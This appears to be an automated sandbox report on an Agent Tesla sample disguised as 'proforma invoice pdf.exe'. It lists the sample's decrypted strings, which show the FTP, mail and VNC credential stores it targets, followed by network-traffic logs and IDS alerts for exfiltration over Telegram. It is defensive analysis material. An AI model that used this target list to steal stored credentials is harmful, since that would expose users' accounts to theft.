Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: \FlashFXP\
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: yA36zA48dEhfrvghGRg57h5UlDv3
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: FTP Navigator
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: SystemDrive
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: \FTP Navigator\Ftplist.txt
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: Server
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: Password
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: No Password
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: User
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: SmartFTP
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: APPDATA
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: SmartFTP\Client 2.0\Favorites\Quick Connect
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: WS_FTP
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: appdata
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: Ipswitch\WS_FTP\Sites\ws_ftp.ini
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: HOST
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: PWD=
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: PWD=
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: FtpCommander
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: SystemDrive
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: \Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: SystemDrive
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: \Program Files (x86)\FTP Commander\Ftplist.txt
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: SystemDrive
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: \cftp\Ftplist.txt
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: \VirtualStore\Program Files (x86)\FTP Commander\Ftplist.txt
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: \VirtualStore\Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: ;Password=
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: ;User=
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: ;Server=
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: ;Port=
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: ;Port=
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: ;Password=
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: ;User=
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: ;Anonymous=
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: FTPGetter
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: \FTPGetter\servers.xml
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: <server>
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: <server_ip>
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: <server_ip>
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: </server_ip>
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: <server_port>
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: </server_port>
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: <server_user_name>
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: <server_user_name>
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: </server_user_name>
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: <server_user_password>
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: <server_user_password>
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: </server_user_password>
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: FTPGetter
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: The Bat!
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: appdata
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: \The Bat!
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: \Account.CFN
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: \Account.CFN
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: +-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: Becky!
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: HKEY_CURRENT_USER\Software\RimArts\B2\Settings
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: DataDir
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: Folder.lst
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: \Mailbox.ini
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: Account
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: PassWd
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: Account
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: SMTPServer
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: Account
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: MailAddress
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: Becky!
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: Outlook
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: Email
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: IMAP Password
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: POP3 Password
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: HTTP Password
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: SMTP Password
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: Email
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: Email
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: Email
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: IMAP Password
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: POP3 Password
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: HTTP Password
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: SMTP Password
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: Server
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: Windows Mail App
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: COMPlus_legacyCorruptedStateExceptionsPolicy
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: Software\Microsoft\ActiveSync\Partners
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: Email
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: Server
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: SchemaId
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: pResourceElement
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: pIdentityElement
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: pPackageSid
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: pAuthenticatorElement
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: syncpassword
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: mailoutgoing
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: FoxMail
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: HKEY_CURRENT_USER\Software\Aerofox\FoxmailPreview
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: Executable
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: HKEY_CURRENT_USER\Software\Aerofox\Foxmail\V3.1
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: FoxmailPath
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: \Storage\
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: \Storage\
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: \mail
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: \mail
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: \VirtualStore\Program Files\Foxmail\mail
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: \VirtualStore\Program Files\Foxmail\mail
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: \Accounts\Account.rec0
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: \Accounts\Account.rec0
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: \Account.stg
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: \Account.stg
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: POP3Host
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: SMTPHost
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: IncomingServer
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: Account
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: MailAddress
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: Password
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: POP3Password
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: Opera Mail
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: \Opera Mail\Opera Mail\wand.dat
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: \Opera Mail\Opera Mail\wand.dat
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: opera:
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: abcdefghijklmnopqrstuvwxyz1234567890_-.~!@#$%^&*()[{]}\\|';:,<>/?+=
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: PocoMail
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: appdata
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: \Pocomail\accounts.ini
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: Email
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: POPPass
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: SMTPPass
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: SMTP
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: eM Client
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: eM Client\accounts.dat
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: eM Client
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: Accounts
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: "Username":"
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: "Secret":"
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: 72905C47-F4FD-4CF7-A489-4E8121A155BD
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: "ProviderName":"
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: o6806642kbM7c5
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: Mailbird
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: SenderIdentities
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: Accounts
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: \Mailbird\Store\Store.db
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: Server_Host
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: Accounts
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: Email
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: Username
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: EncryptedPassword
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: Mailbird
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: RealVNC 4.x
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: SOFTWARE\Wow6432Node\RealVNC\WinVNC4
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: Password
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: RealVNC 3.x
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: SOFTWARE\RealVNC\vncserver
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: Password
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: RealVNC 4.x
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: SOFTWARE\RealVNC\WinVNC4
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: Password
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: RealVNC 3.x
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: Software\ORL\WinVNC3
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: Password
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: TightVNC
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: Software\TightVNC\Server
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: Password
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: TightVNC
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: Software\TightVNC\Server
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: PasswordViewOnly
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: TightVNC ControlPassword
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: Software\TightVNC\Server
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: ControlPassword
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: TigerVNC
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: Software\TigerVNC\Server
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: Password
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: UltraVNC
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: ProgramFiles(x86)
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: passwd
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: UltraVNC
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: ProgramFiles(x86)
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: passwd2
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: UltraVNC
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: ProgramFiles
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: passwd
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: UltraVNC
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: ProgramFiles
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: passwd2
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: UltraVNC
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: ProgramFiles
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: \UltraVNC\ultravnc.ini
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: passwd
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: UltraVNC
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: ProgramFiles
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: \UltraVNC\ultravnc.ini
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: passwd2
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: UltraVNC
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: ProgramFiles(x86)

Source: proforma invoice pdf.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.7:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.7:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.7:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.7:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49726 version: TLS 1.2

Source: proforma invoice pdf.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe

Code function: 4x nop then jmp 05552D0Ch

17_2_0555268A

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:49731 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:49727 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:49736 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:49740 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:49729 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:49730 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:49717 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:49724 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:49716 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:49713 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:49722 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.7:49717 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.7:49713 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2851779 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil : 192.168.2.7:49722 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.7:49722 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:49738 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:49734 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.7:49727 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2851779 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil : 192.168.2.7:49716 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.7:49716 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:49733 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.7:49736 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.7:49730 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.7:49724 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:49737 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.7:49731 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:49742 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:49744 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2854281 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound : 149.154.167.220:443 -> 192.168.2.7:49717
Source: Network traffic	Suricata IDS: 2854281 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound : 149.154.167.220:443 -> 192.168.2.7:49713
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.7:49729 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.7:49738 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:49745 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2854281 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound : 149.154.167.220:443 -> 192.168.2.7:49722
Source: Network traffic	Suricata IDS: 2854281 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound : 149.154.167.220:443 -> 192.168.2.7:49727
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:49743 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2854281 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound : 149.154.167.220:443 -> 192.168.2.7:49724
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:49739 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.7:49740 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.7:49734 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.7:49744 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:49711 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.7:49745 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.7:49743 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.7:49742 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.7:49733 -> 149.154.167.220:443
